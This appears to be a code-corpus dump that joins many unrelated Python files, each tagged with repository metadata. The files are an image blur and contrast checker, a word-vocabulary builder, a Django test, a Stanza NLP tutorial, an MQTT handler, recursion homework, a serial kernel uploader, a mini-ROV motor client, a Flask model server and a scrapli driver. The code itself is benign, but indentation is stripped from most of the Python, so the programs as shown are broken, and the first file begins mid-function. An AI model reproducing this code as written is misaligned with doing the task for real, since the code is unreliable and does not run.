img_grey = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
contrast = img_grey.std()
print(contrast, end = ' ')
if(contrast > 45):
print('Normal')
plt.title('Normal')
else:
print('Low')
plt.title('Low')
elif method == 'mich': #michelson
Y = cv2.cvtColor(img, cv2.COLOR_BGR2YUV)[:,:,0]
# compute min and max of Y
min = int(np.min(Y))
max = int(np.max(Y))
# compute contrast
contrast = (max-min)/(max+min)
print(contrast, end = ' ')
if(contrast > 0.8):
print('Normal')
plt.title('Normal')
else:
print('Low')
plt.title('Low')
plt.imshow(cv2.cvtColor(img, cv2.COLOR_BGR2RGB) )
plt.show()
def variance_of_laplacian(image):
'''
Compute the Laplacian of the image and return its variance
'''
return cv2.Laplacian(image, cv2.CV_64F).var()
def check_blur(path):
img = cv2.imread(path)
img_gray = cv2.imread(path,0)
var = variance_of_laplacian(img_gray)
plt.figure()
if var<100:
print('Blurry')
plt.title('Blurry')
else:
print('Normal')
plt.title('Normal')
plt.imshow(cv2.cvtColor(img, cv2.COLOR_BGR2RGB) )
plt.show()
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser(description='FcarScan Task - Blur and Contrast check')
parser.add_argument('--image', default='view1.jpeg', type=str, help='Path of the image file')
parser.add_argument('--folder', default='False', type=str, help='True if path is a directory')
parser.add_argument('--method', default='rms', type=str, help='RMS (rms) or Michelson (mich)')
parser.add_argument('--choice', default='blur', type=str, help='Blur (blur) or Contrast (con) Analysis')
args = parser.parse_args()
if args.choice == 'blur':
print('Blur Analysis')
if args.folder == 'True':
import os
files = os.listdir(args.image)
files = [os.path.join(args.image, file) for file in files]
for file in files:
print('Image name :', file, end=' ')
check_blur(file)
else:
print('Image name :', args.image, end=' ')
check_blur(args.image)
else:
if args.folder == 'True':
import os
files = os.listdir(args.image)
files = [os.path.join(args.image, file) for file in files]
for file in files:
print('Image name :', file, end=' ')
check_contrast(file, args.method)
else:
print('Image name :', args.image, end=' ')
check_contrast(args.image,args.method)
| 3.015625 | 3 |
WordInput.py | Lee-Jooho/wordembedding | 0 | 12799128 | import numpy as np
import string
import re
import nltk
nltk.download('stopwords')
stop_words = nltk.corpus.stopwords.words('english')
class word_inform():
def __init__(self):
self.inform = {}
def wordinput(self):
        WI = input('문장을 입력해주세요 : ') # read in the sentence. WI = word input.
        WI = WI.replace('\n',' ') # if the paragraph has line breaks, replace them with spaces
        #be = {'am', 'is', 'are', 'be' , 'was', 'were'} # store the be verbs.
WI = WI.lower()
#WI = WI.replace("i'm",'i am') # be동사를 찾아내기 위해, 변환을 해준다.
#WI = WI.replace("he's",'he is') # be동사를 찾아내기 위해, 변환을 해준다.
#WI = WI.replace("she's",'she is') # be동사를 찾아내기 위해, 변환을 해준다.
#WI = WI.replace("that's",'that is') # be동사를 찾아내기 위해, 변환을 해준다
#WI = WI.replace("what's",'what is') # be동사를 찾아내기 위해, 변환을 해준다.
#WI = WI.replace("it's",'it is') # be동사를 찾아내기 위해, 변환을 해준다. (is 줄임말 풀어주기.)
#WI = WI.replace("you're",'you are') # be동사를 찾아내기 위해, 변환을 해준다.
#WI = WI.replace("they're",'they are') # be동사를 찾아내기 위해, 변환을 해준다.
#WI = WI.replace("we're",'we are') # be동사를 찾아내기 위해, 변환을 해준다.
#Auxiliary_verb = {'will','would','can','could','shall','should','may','might','must'}
#WI = WI.replace("i'll",'i will') # 조동사를 찾아내기 위해, 변환을 해준다.
#WI = WI.replace("you'll",'you will') # 조동사를 찾아내기 위해, 변환을 해준다.
#WI = WI.replace("they'll",'they will') # 조동사를 찾아내기 위해, 변환을 해준다.
#WI = WI.replace("we'll",'we will') # 조동사를 찾아내기 위해, 변환을 해준다.
#WI = WI.replace("he'll",'he will') # 조동사를 찾아내기 위해, 변환을 해준다.
#WI = WI.replace("she'll",'she will') # 조동사를 찾아내기 위해, 변환을 해준다.
#WI = WI.replace("it'll",'it will') # 조동사를 찾아내기 위해, 변환을 해준다.
#WI = WI.replace("that'll",'that will') # 조동사를 찾아내기 위해, 변환을 해준다.
#WI = WI.replace("i'd",'i would') # 조동사를 찾아내기 위해, 변환을 해준다.
#WI = WI.replace("you'd",'you would') # 조동사를 찾아내기 위해, 변환을 해준다.
#WI = WI.replace("they'd",'they would') # 조동사를 찾아내기 위해, 변환을 해준다.
#WI = WI.replace("we'd",'we would') # 조동사를 찾아내기 위해, 변환을 해준다.
#WI = WI.replace("he'd",'he would') # 조동사를 찾아내기 위해, 변환을 해준다.
#WI = WI.replace("she'd",'she would') # 조동사를 찾아내기 위해, 변환을 해준다.
#WI = re.sub("[.]{2,}",'',WI) # 마침표 두개이상 없애기
WI = re.sub('[\\w.]+@[\\w.]+',' ',WI)
WI = re.sub("[?!'.]{1,}",'.',WI)
WI = re.sub("[^\w\s'.]+",'',WI) # 특수문자 제거하기 따옴표는 제거하지 않음... >> stop words에 포함된 단어 you'll 같은 거 때문.
WI = re.sub("[.]{1,}",'.',WI)
sentence = WI.strip(string.punctuation).split('.') # 문단에 마침표가 있다면, 문장을 분리해주기. 마지막에 있는 구두점 떼어주기.
sentence_words = [s.split() for s in sentence] # 각각의 문장속에 있는 단어 분리 해주기.
self.inform['sentence_words'] = sentence_words
def word_voc(self,voc):
before_voc_length = len(voc)
        sentence_words = self.inform['sentence_words'] # the input sentences as they were received.
for length in range(len(sentence_words)):
for vocab in sentence_words[length]:
                if vocab.isdigit() == False: # digits keep getting into the training sentences and seem to hurt learning (so digits are excluded).
if vocab not in stop_words:
if vocab not in voc:
voc.append(vocab)
self.inform['voc'] = voc
after_voc_length = len(voc)
self.inform['voc_length_diff'] = (after_voc_length - before_voc_length)
self.inform['voc_length'] = after_voc_length
word_vector = [[] for i in sentence_words]
word_sentence = [[] for i in sentence_words]
voc_vectors = []
for word in voc:
            voc_vector = np.zeros_like(voc, dtype = int) # create a new vector the size of the vocabulary.
            index_of_input_word = voc.index(word)
            voc_vector[index_of_input_word] += 1 # mark the index this word occupies in the vocabulary.
voc_vectors.append(voc_vector)
self.inform['voc_vectors'] = voc_vectors
        # word_vector >> a list of the input sentences, separated into words.
for length in range(len(sentence_words)):
for word in sentence_words[length]:
                if word.isdigit() == False: # digits keep getting into the training sentences and seem to hurt learning (so digits are excluded).
if word not in stop_words:
                        voc_vector = np.zeros_like(voc, dtype = int) # create a new vector the size of the vocabulary.
                        index_of_input_word = voc.index(word)
                        voc_vector[index_of_input_word] += 1 # mark the index this word occupies in the vocabulary.
word_vector[length].append(voc_vector)
word_sentence[length].append(word)
self.inform['sentence_words'] = word_sentence
self.inform['word_vector'] = word_vector
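# Minimal usage sketch (not part of the original script): build one-hot word vectors
# interactively from typed sentences.
#   info = word_inform()
#   info.wordinput()        # prompts on stdin and stores the tokenized sentences
#   info.word_voc([])       # grows the vocabulary and builds the one-hot vectors
#   print(info.inform['voc'])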
| 3.375 | 3 |
django/publicmapping/redistricting/tests/test_score_statistics_set.py | azavea/district-builder-dtl-pa | 5 | 12799129 | from base import BaseTestCase
from django.contrib.auth.models import User
from redistricting.models import *
class StatisticsSetTestCase(BaseTestCase):
fixtures = [
'redistricting_testdata.json',
'redistricting_testdata_geolevel2.json',
'redistricting_statisticssets.json',
]
def setUp(self):
super(StatisticsSetTestCase, self).setUp()
display = ScoreDisplay.objects.get(title='Demographics')
summary = ScorePanel.objects.get(title='Plan Summary')
demographics = ScorePanel.objects.get(title='Demographics')
display.scorepanel_set.add(summary)
display.scorepanel_set.add(demographics)
functions = ScoreFunction.objects.filter(
name__in=('Voting Age Population',
'Hispanic voting-age population', 'Total Population'))
demographics.score_functions = functions.all()
demographics.save()
self.functions = functions.all()
self.demographics = demographics
self.summary = summary
self.display = display
def tearDown(self):
self.display.delete()
super(StatisticsSetTestCase, self).tearDown()
def test_copy_scoredisplay(self):
user = User(username="Stats User")
user.save()
# We'll set the owner but it's overwritten
copy = ScoreDisplay(owner=user)
copy = copy.copy_from(display=self.display)
self.assertEqual(
"%s copy" % self.display.__unicode__(), copy.__unicode__(),
"ScoreDisplay title copied, allowing same name for user more than once"
)
self.assertEqual(
len(copy.scorepanel_set.all()),
len(self.display.scorepanel_set.all()),
"Copied scoredisplay has wrong number of panels attached")
self.assertNotEqual(
user, copy.owner,
"ScoreDisplay copied owner rather than copying owner from ScoreDisplay"
)
copy = ScoreDisplay(owner=user)
copy = copy.copy_from(display=self.display, owner=user)
self.assertEqual(self.display.__unicode__(), copy.__unicode__(),
"Title of scoredisplay not copied")
self.assertEqual(
len(copy.scorepanel_set.all()),
len(self.display.scorepanel_set.all()),
"Copied scoredisplay has wrong number of panels attached")
vap = ScoreFunction.objects.get(name="Voting Age Population")
copy = copy.copy_from(
display=self.display,
functions=[unicode(str(vap.id))],
title="Copied from")
self.assertEqual(
len(copy.scorepanel_set.all()),
len(self.display.scorepanel_set.all()),
"Copied scoredisplay has wrong number of panels attached")
new_demo = ScoreDisplay.objects.get(title="Copied from")
panels_tested = 0
for panel in new_demo.scorepanel_set.all():
if panel.title == "Plan Summary":
self.assertEqual(
len(self.summary.score_functions.all()),
len(panel.score_functions.all()),
"Copied plan summary panel didn't have correct number of functions"
)
panels_tested += 1
elif panel.title == "Demographics":
self.assertEqual(1, len(
panel.score_functions.all()
), "Copied demographics panel didn't have correct number of functions"
)
panels_tested += 1
self.assertEqual(2, panels_tested,
"Copied scoredisplay didn't have both panels needed")
# Let's try just updating those score functions
new_copy = ScoreDisplay(owner=user)
new_copy = copy.copy_from(display=copy, functions=self.functions)
self.assertEqual(copy.title, new_copy.title,
"Title of scoredisplay not copied")
self.assertEqual(copy.id, new_copy.id,
"Scorefunctions not added to current display")
self.assertEqual(
len(copy.scorepanel_set.all()), len(new_copy.scorepanel_set.all()),
"Copied scoredisplay has wrong number of panels attached")
panels_tested = 0
for panel in new_copy.scorepanel_set.all():
if panel.title == "Plan Summary":
self.assertEqual(
len(self.summary.score_functions.all()),
len(panel.score_functions.all()),
"Copied plan summary panel didn't have correct number of functions"
)
panels_tested += 1
elif panel.title == "Demographics":
self.assertEqual(
len(self.functions), len(panel.score_functions.all()),
"Copied demographics panel didn't have correct number of functions; e:%d,a:%d"
% (3, len(panel.score_functions.all())))
panels_tested += 1
self.assertEqual(2, panels_tested,
"Copied scoredisplay didn't have both panels needed")
| 2.1875 | 2 |
stanza_bio.py | daniloBlera/biomed-parsers-intro | 0 | 12799130 | <filename>stanza_bio.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Some simple usage examples of the stanfordnlp Stanza library
The original Colab notebook where this script came from:
https://colab.research.google.com/drive/1AEdAzR4_-YNEClAB2TfSCYmWz7fIcHIO?usp=sharing
Colab notebook on scispaCy:
https://colab.research.google.com/drive/1O5qxkgvB3x80PuOo6EbVZnw55fnd_MZ3?usp=sharing
This script requires the 'stanza' and 'nltk' modules, I'd highly recommend you
install both libraries under an isolated python virtual environment and avoid
borking your system's python installation
Some extra info:
Python version: 3.8.6
OS: arch linux
"""
# Importing modules
import re
import stanza
import nltk
# The path where downloads should be saved. By default it points to your user's
# HOME directory on linux/macos, no idea where it does it on windows.
STANZA_DOWNLOAD_DIR = './stanza_resources'
# Downloading the biomedical models
# Our main pipeline, trained with the CRAFT corpus
stanza.download('en', dir=STANZA_DOWNLOAD_DIR, package='craft')
# The NER models
stanza.download(lang='en', dir=STANZA_DOWNLOAD_DIR, package='jnlpba')
stanza.download(lang='en', dir=STANZA_DOWNLOAD_DIR, package='linnaeus')
stanza.download(lang='en', dir=STANZA_DOWNLOAD_DIR, package='s800')
# Initializing the document annotator
nlp = stanza.Pipeline(lang='en', dir=STANZA_DOWNLOAD_DIR, package='craft')
# Defining the text
# The text below was extracted from the 2019 BioNLP OST `BB-Rel` task, document
# `BB-rel-14633026.txt` from the Development dataset.
#
# Task URL: https://sites.google.com/view/bb-2019/dataset#h.p_n7YHdPTzsDaj
text = """
Characterization of a mosquitocidal Bacillus thuringiensis serovar sotto strain
isolated from Okinawa, Japan. To characterize the mosquitocidal activity of
parasporal inclusions of the Bacillus thuringiensis serovar sotto strain
96-OK-85-24, for comparison with two well-characterized mosquitocidal strains.
The strain 96-OK-85-24 significantly differed from the existing mosquitocidal
B. thuringiensis strains in: (1) lacking the larvicidal activity against Culex
pipiens molestus and haemolytic activity, and (2) SDS-PAGE profiles,
immunological properties and N-terminal amino acid sequences of parasporal
inclusion proteins. It is clear from the results that the strain 96-OK-85-24
synthesizes a novel mosquitocidal Cry protein with a unique toxicity spectrum.
This is the first report of the occurrence of a mosquitocidal B. thuringiensis
strain with an unusual toxicity spectrum, lacking the activity against the
culicine mosquito.
"""
print(text)
# Removing newlines
# The line below will replace newlines with a single whitespace, then any
# trailing spaces will be trimmed. We'll leave sentence segmentation for the
# trained model to handle.
text = re.sub(r'\n+', ' ', text).strip()
print(text)
# Annotating the document
# Just call `nlp(STRING)` and that's pretty much it
doc = nlp(text)
# Tokenization, Lemmas and Part-of-Speech (PoS) and Sentence Segmentation
# An annotated document will have the following [structure][stanza-objs]:
# * A `document` contains `sentences`;
# * A `sentence` contains `tokens`/`words`;
# * A `token` contains one of more `words`;
# note: in stanza there is a distinction between a [Token][stanza-token] and a
# [Word][stanza-word] object.
# Unlike `spacy`, in order to access a word's properties (e.g.: lemma, PoS
# tags, etc.) you must iterate over the document's sentences and then iterate
# over each sentence to get its tokens/words (which also means their token
# IDs are relative to the sentences they're from, you'll see down below). In
# general, a stanza code looks something like this:
# for sent in doc.sentences:
# # Operating on the document sentences
# # At this level you get the semantic dependencies
#
# for token in sent.tokens:
# # Operating on the sentence's tokens
#
# for word in sent.words:
# # Operating on the sentence's words
#
# https://stanfordnlp.github.io/stanza/data_objects.html
# https://stanfordnlp.github.io/stanza/data_objects.html#token
# https://stanfordnlp.github.io/stanza/data_objects.html#word
for (i, sent) in enumerate(doc.sentences):
print(f'SENTENCE {i+1}')
print(' ID TEXT LEMMA UPOS POS')
for word in sent.words:
print(f'{word.id:>4} {word.text:>20} {word.lemma:<20} {word.upos:>5}',
f'{word.xpos:<5}')
print()
# Semantic Dependency Parsing
# Semantic dependency information can be accessed at sentence level
print(' ID TEXT DEP HEAD TEXT HEAD ID')
for (i, sent) in enumerate(doc.sentences):
print(f'SENTENCE {i+1}')
print(' ID WORD TEXT <---DEP--- HEAD TEXT ID')
for dep in sent.dependencies:
# Using 'Source' and 'Target' here as a reference to the semantic
# dependency arrow direction
[src_word, deprel, tgt_word] = dep
print(f'{tgt_word.id:>4} {tgt_word.text:>20} <{deprel:-^9}',
f'{src_word.text:<20} {src_word.id:>4}')
print()
# Noun Chunks
# The stanza framework has no built-in chunking, instead we'll be using the
# `nltk` module and its example noun chunk grammar:
#
# <DT>?<JJ.*>*<NN.*>+
#
# * `<DT>?` - An optional determiner;
# * `<JJ.*>*` - Zero or more adjectives;
# * `<NN.*>+` - One or more nouns.
#
# where:
# * `?` means zero or one of the previous pattern;
# * `*` means zero or more of the previous pattern;
# * `+` means one or more of the previous pattern;
# * `.` means any (single) character.
#
# https://www.nltk.org/book/ch07.html
def print_chunks(doc: stanza.Document, grammar: str,
print_full_tree: bool = True):
"""
Print a document's chunks
Arguments:
doc: stanza.Document
An (PoS) annotated document
grammar: str
An nltk chunk grammar regular expression
print_full_tree: True|False
If true, print the whole tree, else print only the matching grammar
chunks
"""
cp = nltk.RegexpParser(grammar)
for (i, sent) in enumerate(doc.sentences):
print(f'SENTENCE {i+1}')
sentence = [(w.text, w.xpos) for w in sent.words]
chunk_tree = cp.parse(sentence)
if print_full_tree is True:
print(chunk_tree, end='\n\n')
else:
for subtree in chunk_tree.subtrees():
if subtree.label() == 'NP':
print(subtree)
print()
grammar = 'NP: {<DT>?<JJ.*>*<NN.*>+}'
print_chunks(doc, grammar, print_full_tree=False)
print_chunks(doc, grammar, print_full_tree=True)
# Named Entity Recognition (NER)
# From stanza's available NER models we'll test the JNLPBA, Linnaeus and S800
# models
#
# https://stanfordnlp.github.io/stanza/available_biomed_models.html#biomedical--clinical-ner-models
def show_ner(text: str, ner_model: str):
"""
Just a shortcut to annotate the text with the given NER model
"""
nlp = stanza.Pipeline(lang='en', package='craft',
dir=STANZA_DOWNLOAD_DIR,
processors={'ner': ner_model})
doc = nlp(text)
print(f'\nNER MODEL: {ner_model}')
print('TYPE TEXT')
for ent in doc.entities:
print(f'{ent.type:<10} {ent.text}')
show_ner(text, 'jnlpba')
show_ner(text, 'linnaeus')
show_ner(text, 's800')
| 2.5625 | 3 |
boj/4344.py | pparkddo/ps | 1 | 12799131 | <filename>boj/4344.py
import sys; input=sys.stdin.readline
for _ in range(int(input())):
n, *scores = map(int, input().split())
average = sum(scores) / len(scores)
answer = len(list(filter(lambda x: x > average, scores))) / len(scores)
print(f"{answer:.3%}")
| 3.453125 | 3 |
dhbwFischertechnik/factoryWebsite/mqttHandler.py | Ic3Fighter/Modellfabrik | 4 | 12799132 | <filename>dhbwFischertechnik/factoryWebsite/mqttHandler.py
import json
from asgiref.sync import async_to_sync
from channels.layers import get_channel_layer
from factoryWebsite.models import Order
from factoryWebsite.utils import sendNewOrderToFactory
monitorMainUnit = False
temperatureMainUnit = ""
voltageMainUnit = ""
monitorSortingLine = False
colorSortingLine = ""
temperatureSortingLine = ""
voltageSortingLine = ""
def Status_Data_Handler(topic, data):
json_Dict = json.loads(data)
message = json_Dict['Text']
short_topic = topic.partition("Status/")[2]
customer_group_name = 'name_%s' % short_topic
channel_layer = get_channel_layer()
async_to_sync(channel_layer.group_send)(
customer_group_name,
{
'type': 'status_message',
'message': message
}
)
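# Example payload for Status_Data_Handler (shape inferred from the json access above;
# the exact topic and text are illustrative): topic "Status/customer1", data '{"Text": "Order started"}'.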
def Monitoring_Data_Handler(topic, data):
global colorSortingLine, temperatureSortingLine, voltageSortingLine, temperatureMainUnit, voltageMainUnit, \
monitorSortingLine, monitorMainUnit
json_Dict = json.loads(data)
if topic == "Monitor/MainUnit":
temperatureMainUnit = json_Dict['Temperature']
voltageMainUnit = json_Dict['Voltage']
monitorMainUnit = True
elif topic == "Monitor/SortingLine":
colorSortingLine = json_Dict['Color']
temperatureSortingLine = json_Dict['Temperature']
voltageSortingLine = json_Dict['Voltage']
monitorSortingLine = True
if monitorMainUnit and monitorSortingLine:
monitorMainUnit = False
monitorSortingLine = False
channel_layer = get_channel_layer()
async_to_sync(channel_layer.group_send)(
'sensors_monitoring',
{
'type': 'monitoring_message',
'colorSortingLine': colorSortingLine,
'temperatureSortingLine': temperatureSortingLine,
'voltageSortingLine': voltageSortingLine,
'temperatureMainUnit': temperatureMainUnit,
'voltageMainUnit': voltageMainUnit
}
)
def Storage_Data_Handler(data):
json_Dict = json.loads(data)
channel_layer = get_channel_layer()
async_to_sync(channel_layer.group_send)(
'storage_monitoring',
{
'type': 'storage_message',
'storage0': json_Dict['Storage0'],
'storage1': json_Dict['Storage1'],
'storage2': json_Dict['Storage2'],
'storage3': json_Dict['Storage3'],
'storage4': json_Dict['Storage4'],
'storage5': json_Dict['Storage5'],
'storage6': json_Dict['Storage6'],
'storage7': json_Dict['Storage7'],
'storage8': json_Dict['Storage8']
}
)
def Order_Ready_Data_Handler(data):
json_Dict = json.loads(data)
last_id = json_Dict['LastId']
try:
recentOrder = Order.objects.get(transaction_id=last_id)
recentOrder.finished = True
recentOrder.save()
# recentOrder.delete()
except Order.DoesNotExist:
pass
sendNewOrderToFactory(True)
def topic_Data_Handler_QoS_0(topic, data):
if topic.startswith("Monitor"):
Monitoring_Data_Handler(topic, data)
elif topic == "Storage/Factory":
Storage_Data_Handler(data)
def topic_Data_Handler_QoS_2(topic, data):
if topic.startswith("Status"):
Status_Data_Handler(topic, data)
elif topic == "Order/Ready":
Order_Ready_Data_Handler(data)
| 2.359375 | 2 |
homework5.py | chubbypanda/principles-of-computing | 22 | 12799133 | # Homework 5 for Principles of Computing class, by k., 07/19/2014
# Question 1
class Incrementer(object):
'''
counting increments separately from the function
'''
def __init__(self, count):
self.count = count
def increment(self):
self.count += 1
"""
Recursion according to the "Cat in the Hat"
"""
def get_next_cat(current_cat):
"""
Helper function to get next cat
"""
if current_cat == "Cat in the Hat":
return "Little Cat A"
elif current_cat != "Little Cat Z":
return "Little Cat " + chr(ord(current_cat[-1]) + 1)
else:
return "Voom"
def clean_up(helper_cat):
"""
Recursive function that prints out story
"""
if helper_cat == "Voom":
print helper_cat + ": I got this. Mess is all cleaned up!"
else:
next_cat = get_next_cat(helper_cat)
print helper_cat + ": I'll have", next_cat, "clean up!"
clean_up(next_cat)
i.increment()
# get those cats to work!!!!!
print 'Question 1 prep...'
i = Incrementer(0)
clean_up("Cat in the Hat")
i.increment()
print 'Question 1 answer:', i.count
# Question 2
def add_up(n):
if n == 0:
return 0
else:
return n + add_up(n - 1)
print '\nPrep for Question 2 follows...'
print 'when n is 0:', add_up(0)
print 'when n is 1:', add_up(1)
print 'when n is 2:', add_up(2)
print 'when n is 3:', add_up(3)
print 'when n is 4:', add_up(4)
print 'when n is 5:', add_up(5)
print 'when n is 6:', add_up(6)
print 'when n is 7:', add_up(7)
print 'when n is 8:', add_up(8)
# Question 3
def multiply_up(n):
if n == 0:
return 1
else:
return n * multiply_up(n - 1)
print '\nPrep for Question 3 follows...'
print 'when n is 0:', multiply_up(0)
print 'when n is 1:', multiply_up(1)
print 'when n is 2:', multiply_up(2)
print 'when n is 3:', multiply_up(3)
print 'when n is 4:', multiply_up(4)
print 'when n is 5:', multiply_up(5)
print 'when n is 6:', multiply_up(6)
print 'when n is 7:', multiply_up(7)
print 'when n is 8:', multiply_up(8)
# Question 4
def fib(num):
if num == 0:
return 0
elif num == 1:
return 1
else:
j.increment()
return fib(num - 1) + fib(num - 2)
print '\nPrep for Question 4 follows...'
j = Incrementer(0)
fib(2)
print 'when n is 2:', j.count
j = Incrementer(0)
fib(3)
print 'when n is 3:', j.count
j = Incrementer(0)
fib(4)
print 'when n is 4:', j.count
j = Incrementer(0)
fib(5)
print 'when n is 5:', j.count
j = Incrementer(0)
fib(6)
print 'when n is 6:', j.count
j = Incrementer(0)
fib(7)
print 'when n is 7:', j.count
j = Incrementer(0)
fib(8)
print 'when n is 8:', j.count
# Question 5
def memoized_fib(num, memo_dict):
k.increment()
if num in memo_dict:
return memo_dict[num]
else:
sum1 = memoized_fib(num - 1, memo_dict)
#k.increment()
sum2 = memoized_fib(num - 2, memo_dict)
#k.increment()
memo_dict[num] = sum1 + sum2
return sum1 + sum2
print '\nPrep for Question 5 follows...'
k = Incrementer(0)
memoized_fib(0, {0 : 0, 1 : 1})
print 'when n is 0:', k.count
k = Incrementer(0)
memoized_fib(1, {0 : 0, 1 : 1})
print 'when n is 1:', k.count
k = Incrementer(0)
memoized_fib(2, {0 : 0, 1 : 1})
print 'when n is 2:', k.count
k = Incrementer(0)
memoized_fib(3, {0 : 0, 1 : 1})
print 'when n is 3:', k.count
k = Incrementer(0)
memoized_fib(4, {0 : 0, 1 : 1})
print 'when n is 4:', k.count
k = Incrementer(0)
memoized_fib(5, {0 : 0, 1 : 1})
print 'when n is 5:', k.count
k = Incrementer(0)
memoized_fib(6, {0 : 0, 1 : 1})
print 'when n is 6:', k.count
k = Incrementer(0)
memoized_fib(7, {0 : 0, 1 : 1})
print 'when n is 7:', k.count
# Question 6
def outcomes(word):
'''
generate (function shall be recursive!) all strings that can be composed
from the letters in word in any order;
returns a list of all strings that can be formed from the letters in word
'''
# base case; no string
if not word:
return ['']
possibilities = []
# generate all appropriate strings for rest of the word
for string in outcomes(word[1:]):
l.increment()
for index in range(len(string) + 1):
# inserting the initial character in all possible positions within the string
possibilities.append(string[:index] + word[0] + string[index:])
l.increment()
return outcomes(word[1:]) + possibilities
print '\nPrep for Question 6 follows...'
l = Incrementer(0)
outcomes('a')
print 'when n is 1:', l.count
l = Incrementer(0)
outcomes('ab')
print 'when n is 2:', l.count
l = Incrementer(0)
outcomes('abc')
print 'when n is 3:', l.count
l = Incrementer(0)
outcomes('abcd')
print 'when n is 4:', l.count
l = Incrementer(0)
outcomes('abcde')
print 'when n is 5:', l.count
l = Incrementer(0)
outcomes('abcdef')
print 'when n is 6:', l.count
l = Incrementer(0)
outcomes('abcdefg')
print 'when n is 7:', l.count
| 4.09375 | 4 |
lab5/kernel/sendimg.py | Mechshaman/osc2022 | 0 | 12799134 | import argparse
import serial
import os
parser = argparse.ArgumentParser()
parser.add_argument('image', default='kernel8.img', type=str)
parser.add_argument('device',default='/dev/ttyUSB0', type=str)
args = parser.parse_args()
try:
ser = serial.Serial(args.device,115200)
except:
print("Serial init failed!")
exit(1)
file_path = args.image
file_size = os.stat(file_path).st_size
ser.write(file_size.to_bytes(4, byteorder="big"))
print("Sending kernel...")
with open(file_path, 'rb', buffering = 0) as f:
for i in range(file_size):
ser.write(f.read(1))
print(ser.readline())
print("done") | 2.765625 | 3 |
code/mini-rov/hydrogenMiniROVClient2020.py | CISSROV/2019-Project | 2 | 12799135 | #!/usr/bin/env python3.4
import webSocketClient
import motorInterface
import json
axis = ['xLeft', 'yLeft', 'triggerLeft', 'xRight', 'yRight', 'triggerRight']
buttons = ['A', 'B', 'X', 'Y', 'LB', 'RB']
trimUp = {
'center': 0.0
}
# these are in a row
# this motor is IN3/4 on the edge of the motor controller
m1 = motorInterface.motor(16, 26) # vertical
m2 = motorInterface.motor(12, 13) # unused
# 2nd chip
m3 = motorInterface.motor(27, 23) # side (maybe left)
m4 = motorInterface.motor(4, 18) # side (maybe right)
def move1(pow):
m1.set(pow)
def move2(pow):
m2.set(pow)
def move3(pow):
m3.set(pow)
def move4(pow):
m4.set(pow)
justPressed = [
{
'A': False,
'B': False,
'X': False,
'Y': False,
'LB': False,
'RB': False
},
{
'A': False,
'B': False,
'X': False,
'Y': False,
'LB': False,
'RB': False
}
]
def buttonPressed(button, num):
global trimUp
# num is 0 or 1
if num == 1: # controller number 2
if button == 'LB':
trimUp['center'] += 1
elif button == 'RB':
trimUp['center'] -= 1
def process(data):
joysticks = json.loads(data)
assert len(joysticks) == 24
joystick1 = dict(zip(axis + buttons, joysticks[:12]))
joystick2 = dict(zip(axis + buttons, joysticks[12:]))
old = [] # for debugging
#print('msg:', joysticks)
del data
global justPressed
stickNum = 0
for stick, jPressed in zip((joystick1, joystick2), justPressed):
for k in stick:
if k not in buttons:
continue
v = stick[k]
if v == 1 and not jPressed[k]:
# just pressed
buttonPressed(k, stickNum)
jPressed[k] = True
elif v == 0 and jPressed[k]:
# just released
jPressed[k] = False
elif v not in [1, 0]:
raise ValueError('Got {0}, expected 0 or 1'.format(v))
else:
pass
stickNum += 1
del stickNum
yLeft = 50 * joystick2['yLeft']
#xLeft = 50 * joystick2['xLeft']
yRight = 50 * joystick2['yRight']
#xRight = 50 * joystick2['xRight']
joystick2['triggerRight'] = (joystick2['triggerRight'] + 1) / 2
joystick2['triggerLeft'] = (joystick2['triggerLeft'] + 1) / 2
vertical = 0
if joystick2['triggerRight'] >= 0.1 and joystick2['triggerLeft'] >= 0.1:
pass # do nothing cause both are pressed
else:
if joystick2['triggerRight'] > 0.1:
# spin right
vertical = joystick2['triggerRight'] * 50
if joystick2['triggerLeft'] > 0.1:
# spin left
vertical = -joystick2['triggerLeft'] * 50
# Mini-ROV motor setup
# top view
# ____
# | |
# /a\| |/b\
# |____|
# (up)
#
motor_a = yLeft
motor_b = yRight
global trimUp
motor_up = trimUp['center'] + vertical
def bounds(x):
# max power is -100 to 100
if x < -50:
return -50
if x > 50:
return 50
return round(x, 2)
motor_a = bounds(motor_a)
motor_b = bounds(motor_b)
motor_up = bounds(motor_up)
# right
move1(motor_up)
move4(motor_a)
move3(motor_b)
# print datalist
for i in range(30):
print('\r\033[A\033[K', end='')
print('Trim: {0}'.format(trimUp['center']))
print(joystick1)
print(joystick2)
print(motor_a, motor_b)
print(motor_up)
print()
index = 0
for i in old:
print(index, i)
index += 1
webSocketClient.start('miniROV', process, ip="192.168.1.2")
| 2.25 | 2 |
app.py | tristan-jl/tensorflow-flask | 0 | 12799136 | <filename>app.py
import pandas as pd
import tensorflow_decision_forests as tfdf
from flask import Flask
from flask import jsonify
from flask import request
from tensorflow import keras
app = Flask(__name__)
model = keras.models.load_model("gb_model")
@app.route("/predict", methods=["POST"])
def predict():
data = request.json
df = tfdf.keras.pd_dataframe_to_tf_dataset(pd.DataFrame(data, index=[0]))
prediction = model.predict(df)
return jsonify({"survival": str(prediction.flatten()[0])})
@app.route("/predict_batch", methods=["POST"])
def predict_batch():
data = request.json
df = tfdf.keras.pd_dataframe_to_tf_dataset(pd.DataFrame(data))
predictions = model.predict(df)
return jsonify({"survival_batch": [str(i) for i in predictions.flatten()]})
if __name__ == "__main__":
app.run(port=8080)
| 2.75 | 3 |
scrapli_community/nokia/srlinux/async_driver.py | ikievite/scrapli_community | 37 | 12799137 | <filename>scrapli_community/nokia/srlinux/async_driver.py
"""scrapli_community.nokia.nokia_srlinux.async_driver"""
from scrapli.driver import AsyncNetworkDriver
async def default_async_on_open(conn: AsyncNetworkDriver) -> None:
"""
nokia_srlinux on_open callable
Args:
conn: AsyncNetworkDriver object
Returns:
None
Raises:
N/A
"""
await conn.acquire_priv(desired_priv=conn.default_desired_privilege_level)
await conn.send_command(command="environment cli-engine type basic")
await conn.send_command(command="environment complete-on-space false")
async def default_async_on_close(conn: AsyncNetworkDriver) -> None:
"""
nokia_srlinux default on_close callable
Args:
conn: AsyncNetworkDriver object
Returns:
None
Raises:
N/A
"""
await conn.acquire_priv(desired_priv=conn.default_desired_privilege_level)
conn.channel.write(channel_input="logout")
conn.channel.send_return()
| 2.109375 | 2 |
input/pad.py | villinvic/Georges | 6 | 12799138 | <gh_stars>1-10
from config.loader import Default
from input.enums import Stick, Button, Trigger
from input.action_space import ControllerState
import zmq
import os
import platform
class Pad(Default):
"""Writes out controller inputs."""
